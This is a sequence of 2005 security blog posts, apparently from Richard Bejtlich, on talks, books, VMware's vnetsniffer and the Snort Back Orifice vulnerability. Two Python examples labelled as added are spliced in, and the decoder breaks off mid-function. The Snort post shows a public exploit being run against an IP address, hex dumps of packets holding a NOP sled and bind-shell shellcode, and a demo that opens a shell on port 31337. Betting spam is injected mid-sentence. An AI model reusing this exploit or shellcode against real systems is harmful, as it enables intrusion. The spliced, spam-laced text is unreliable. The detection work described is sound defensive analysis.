Monday, October 31, 2005
Bejtlich to Speak at ShmooCon 2006
I just learned I will speak at ShmooCon 2006 in Washington, DC on Saturday, 14 January 2006 at 1600. The subject is Network Security Monitoring with Sguil.
Friday, October 28, 2005
First Hampton Roads, VA Snort Users Group Meeting
My friend David Bianco is organizing a Hampton Roads, VA Snort Users Group. The first meeting will be 1 December 2005. Check out the story for more details!
FreeBSD 6.0-RELEASE Available Soon

Thursday, October 27, 2005
New (IN)SECURE Magazine Features Bejtlich Article
The latest (IN)SECURE magazine was just published. Issue 1.4 features a 7-page article on Structured Traffic Analysis, a methodology to investigate network traces I developed for my Network Security Operations class.
It uses open source tools to perform zero-knowledge analysis of saved traffic. After reading this article, you may share the sentiments of a student in one of my recent classes who said "I’m embarrassed I ever used Ethereal to start network analysis!"
Review of VMware Workstation 5 Handbook Posted
"Steven S. Warren's VMware Workstation 5 Handbook (VW5H) is a great book for beginning and intermediate VMware Workstation (WS) users. It is well-written, thorough, and informative. Those who are trying to deploy WS for average home, research, or corporate purposes will find their needs met. Those looking for in-depth coverage exceeding VMware's online documentation will be disappointed. Still, I've been using VMware for almost 4 years, and I learned a few new tricks.
VMware's online documentation is excellent. Those seeking to install and operate WS will find most of their needs met reading VMware's free guides. VW5H provides context and problem-solving techniques that one may not acquire from VMware's documentation. For example, a new user may be unaware of the purpose of a product like VMware P2V Assistant. By reading Ch 15 of VW5H, the user will learn how P2V can create virtual machines out of physical systems."
VMware Workstation Vnetsniffer
Did you know VMware Workstation ships with a sniffer? I should have known about it before now. Lenny Zeltser mentioned it in his 2001 paper on reverse engineering malware. There are only 15 references in Google Groups, however.
Vnetsniffer is very limited with regard to reporting. Here is sample output:
C:\Program Files\VMware\VMware Workstation>vnetsniffer
usage: vnetsniffer [/e] (/p "pvnID" | VMnet?)
C:\Program Files\VMware\VMware Workstation>runas /u:administrator "vnetsniffer /e vmnet0"
Enter password for administrator:
Attempting to start "vnetsniffer /e vmnet0" as user "administrator"...
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 60 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c ARP sender
00:13:10:65:2f:ab 192.168.2.1 target 00:00:00:00:00:00 192.168.2.4
ARP request
len 42 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab ARP sender
00:03:47:0f:1f:3c 192.168.2.4 target 00:13:10:65:2f:ab 192.168.2.1
ARP reply
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 435 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c IP src 208.185.174.52
dst 192.168.2.4 TCP
This output doesn't even show TCP or UDP ports, which would be very helpful. Vnetsniffer seems best suited for basic troubleshooting of virtual switches, thanks to the ability to specify a vmnet to monitor. Here I chose vmnet0, which is the default bridged interface. vmnet1 is used for host-only networking, and vmnet8 is used for NAT.
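Since vnetsniffer gives you frames without ports and wraps each record over two or three lines, the practical way to get anything out of it is to re-join the records and tally them. The following parser is an added example of that; it is not part of VMware Workstation and not the author's code. It assumes the field order stays as shown above for IP and ARP frames, and it treats the OUI prefixes 00:0c:29, 00:50:56 and 00:05:69 as VMware-assigned MAC ranges (a fact about VMware's address allocation, not something this post states). The sample input is the output printed above.

```python
"""Re-join and summarize VMware vnetsniffer output (added example).

Assumptions: records start with "len "; IP records read
"len N src MAC dst MAC IP src A dst B PROTO" and ARP records read
"len N src MAC dst MAC ARP sender MAC IP target MAC IP ARP request|reply".
"""
import re
from collections import Counter

# Constructed sample: the vnetsniffer output shown above, wrapped as the blog prints it.
SAMPLE = """\
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 60 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c ARP sender
00:13:10:65:2f:ab 192.168.2.1 target 00:00:00:00:00:00 192.168.2.4
ARP request
len 42 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab ARP sender
00:03:47:0f:1f:3c 192.168.2.4 target 00:13:10:65:2f:ab 192.168.2.1
ARP reply
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 435 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c IP src 208.185.174.52
dst 192.168.2.4 TCP
"""

IP_RE = re.compile(r"^len (\d+) src (\S+) dst (\S+) IP src (\S+) dst (\S+) (\S+)$")
ARP_RE = re.compile(
    r"^len (\d+) src (\S+) dst (\S+) ARP sender (\S+) (\S+) target (\S+) (\S+) ARP (\w+)$")
VMWARE_OUIS = ("00:0c:29", "00:50:56", "00:05:69")  # VMware MAC prefixes (assumption, see lead-in)
BROADCAST = "ff:ff:ff:ff:ff:ff"


def unwrap(text):
    """Join wrapped lines back into one record per frame; a record starts at 'len '."""
    records, current = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("len ") and current:
            records.append(" ".join(current))
            current = []
        current.append(line)
    if current:
        records.append(" ".join(current))
    return records


def parse_record(record):
    """Turn one joined record into a dict; unknown layouts are kept raw, not dropped."""
    m = IP_RE.match(record)
    if m:
        length, smac, dmac, sip, dip, proto = m.groups()
        return {"len": int(length), "src_mac": smac, "dst_mac": dmac,
                "proto": proto, "src_ip": sip, "dst_ip": dip}
    m = ARP_RE.match(record)
    if m:
        length, smac, dmac, sha, spa, tha, tpa, op = m.groups()
        return {"len": int(length), "src_mac": smac, "dst_mac": dmac, "proto": "ARP",
                "op": op, "sender": (sha, spa), "target": (tha, tpa)}
    return {"raw": record, "proto": "unknown"}


def parse(text):
    return [parse_record(r) for r in unwrap(text)]


def is_vmware_oui(mac):
    return mac.lower().startswith(VMWARE_OUIS)


def summarize(frames):
    """Counts per protocol and per source MAC, plus the broadcast frames, which on a
    bridged vmnet are usually a guest asking for an address (0.0.0.0 -> 255.255.255.255)."""
    return {
        "by_proto": Counter(f["proto"] for f in frames),
        "by_src_mac": Counter(f.get("src_mac", "?") for f in frames),
        "broadcast": [f for f in frames if f.get("dst_mac") == BROADCAST],
        "guest_macs": sorted({f["src_mac"] for f in frames
                              if "src_mac" in f and is_vmware_oui(f["src_mac"])}),
    }


if __name__ == "__main__":
    report = summarize(parse(SAMPLE))
    print("frames by protocol:", dict(report["by_proto"]))
    print("VMware guest MACs seen:", report["guest_macs"])
    for f in report["broadcast"]:
        print("broadcast from", f["src_mac"], f.get("src_ip"), "->", f.get("dst_ip"), f["proto"])
```

Run it against a saved vnetsniffer capture (`vnetsniffer /e vmnet0 > vmnet0.txt`, then feed the file to `parse`) and you get the two things the raw output hides: which frames came from a guest (the 00:0c:29 source above) and which were host traffic on the bridged interface. For anything needing ports or payloads, use tcpdump or Ethereal on the host side of the bridge instead.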
Wednesday, October 26, 2005
Bejtlich Books in HNS Contest
Mirko Zorz from Help Net Security notified me that two of my books are up for grabs in the HNS 7th Anniversary Book Contest. You could win Real Digital Forensics or Extrusion Detection: Security Monitoring for Internal Intrusions. The winners will be announced on Monday, 5 December 2005. Good luck!
Tuesday, October 25, 2005
Snort BO Exploit Published
As I expected, FrSIRT published an exploit for the Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target:
1 | manual testing gcc with -O0
Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org
Selected target:
2 | manual testing gcc with -O2
Sending exploit to 66.93.110.10
Done.
Here is what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traffic looks like:
09:30:36.134739 IP 192.168.2.5.56292 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0bdb 0000 4011 f669 c0a8 0205 E.......@..i....
0x0010: 425d 6e0a dbe4 0035 0580 9592 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf d45a 5a79 4d8a b466 aaa2 c875 .....ZZyM..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5ac8 4e7d dca6 c911 55e5 4ff1 ...;Z.N}....U.O.
0x0430: 9f83 5c16 8477 7529 d9b0 6336 e9aa 8210 ..\..wu)..c6....
0x0440: d5ef 789e 77bd 491c 2e92 e890 16bc d51e ..x.w.I.........
0x0450: f8fd 1e58 2446 23ee fa37 8841 3e90 9090 ...X$F#..7.A>...
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
09:30:49.654205 IP 192.168.2.5.55465 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0be4 0000 4011 f660 c0a8 0205 E.......@..`....
0x0010: 425d 6e0a d8a9 0035 0580 8ec2 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf 1fa1 a586 4d8a b466 aaa2 c875 ........M..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5a1c edcf 5da6 c911 55e5 4ff1 ...;Z...]...U.O.
0x0430: 9f77 ffa4 0577 7529 d9b0 6336 e97e 21a2 .w...wu)..c6.~!.
0x0440: 54ef 789e 77bd 491c 2ef1 71b6 0f90 9090 T.x.w.I...q.....
0x0450: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:
* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1
Kyle Haugsness wrote a tool and rules to detect the Snort BO exploit which you might find useful. By following the directions in the code I got it to work on FreeBSD 5.4:
orr:/home/richard$ gcc -Wall -lpcap -o ident-snort-bo-exploit ident-snort-bo-exploit.c
orr:/home/richard$ sudo ./ident-snort-bo-exploit
# Using interface: fxp0
# Using alert output file: stdout
# Using pcap output file: snort-bo-exploit-2005-10-25-09:46:54.cap
#
##############################################
#
# Detected exploit attempt! (details below)
# Note that shellcode should start after 9th
# byte into the payload below (the 8 byte
# magic value has been removed and the
# remainder of the header is 9 bytes).
#
##############################################
#
# Date/time: Tue Oct 25 09:47:21 2005
# Source IP: 192.168.2.5
# Dest IP: 66.93.110.10
# Source port: 64544
# Dest port: 53
# UDP data len: 1400
# BO key (dec): 31337
# BO key (hex): 0x7A69
# BO data len: -18 (UDP len - 17 byte BO header)
# BO pkt id: -1
# BO pkt type: 0x01 (0x01 = PING)
#
# Decrypted BO data:
#
0x0000: FF FF FF FF FF FF FF FF 01 90 90 90 90 90 90 90 ................
0x0010: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0x0020: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
...edited...
0x0550: 3D AA E7 D7 80 CA 0F 07 36 14 2A 0C 65 08 05 8C =.......6.*.e...
0x0560: EE 97 25 0C 0F 90 66 06 2B 5B E2 3C CE E9 14 4B ..%...f.+[.<...K
0x0570: 00 00 00 00 00 00 00 00 ........
#
# Decoded packet num: 1; Exploit: yes; Timestamp: Tue Oct 25 09:47:21 2005
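The tool output above tells you most of what a detector needs: the BO header is 17 bytes (8-byte magic, 4-byte length, 4-byte id, 1-byte type), the exploit packet is 1400 bytes of UDP data encrypted under the default key 31337, its length and id fields decrypt to -1, the type is PING, and the data is a NOP sled. Below is an added decoder that does the same decryption and flags the same anomalies. It is my own illustration, not Kyle's tool and not Snort's preprocessor. Two things in it are assumptions rather than facts from this post: that BO keys the XOR stream with an MSVC-style rand() LCG seeded from the 16-bit key (which is what reproduces the keystream for the packet above), and that the length and id fields are little-endian signed 32-bit values. The NOP-sled threshold is an arbitrary heuristic. The only bytes taken from the page are the first eight payload bytes of the exploit packet from the tcpdump output.

```python
"""Back Orifice 1.x packet decoder with exploit-attempt heuristics (added example).

Assumptions (not from the post): the keystream is an MSVC-style rand() LCG seeded
with the 16-bit key, one byte per step; length and id are little-endian signed ints.
"""
import struct

BO_MAGIC = b"*!*QWTY?"   # plaintext magic that begins every BO 1.x packet
BO_HEADER_LEN = 17       # magic(8) + length(4) + id(4) + type(1), as the tool output states
BO_DEFAULT_KEY = 31337   # key the tool reports for the exploit traffic
BO_TYPE_PING = 0x01
NOP_SLED_MIN = 64        # heuristic threshold, an assumption


def bo_keystream(key, n):
    """Return n keystream bytes. Assumed generator: MSVC rand() seeded with the key,
    each output byte being rand() % 256."""
    state = key & 0xFFFFFFFF
    out = bytearray()
    for _ in range(n):
        state = (state * 214013 + 2531011) & 0xFFFFFFFF
        out.append(((state >> 16) & 0x7FFF) % 256)
    return bytes(out)


def bo_crypt(key, data):
    """XOR data with the keystream; the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, bo_keystream(key, len(data))))


def bo_find_key(payload):
    """Recover the key by trying all 65536 values against the 8-byte magic, which is
    the work a BO preprocessor has to do for every UDP packet it sees."""
    head = payload[:len(BO_MAGIC)]
    if len(head) < len(BO_MAGIC):
        return None
    for key in range(0x10000):
        if bo_crypt(key, head) == BO_MAGIC:
            return key
    return None


def longest_run(data, value):
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def bo_inspect(payload):
    """Decode one UDP payload. Returns None for non-BO traffic, otherwise a dict with
    the decoded header fields and the reasons (if any) it looks like an exploit."""
    key = bo_find_key(payload)
    if key is None:
        return None
    plain = bo_crypt(key, payload)
    result = {"key": key, "udp_len": len(payload), "flags": []}
    if len(plain) < BO_HEADER_LEN:
        result["flags"].append("payload shorter than the 17-byte BO header")
        return result
    # Signed little-endian fields (assumption); the exploit's values decode to -1 / -1.
    bo_len, bo_id, bo_type = struct.unpack_from("<iiB", plain, len(BO_MAGIC))
    data = plain[BO_HEADER_LEN:]
    result.update({"len_field": bo_len, "id": bo_id, "type": bo_type,
                   "data_len_field": bo_len - BO_HEADER_LEN})
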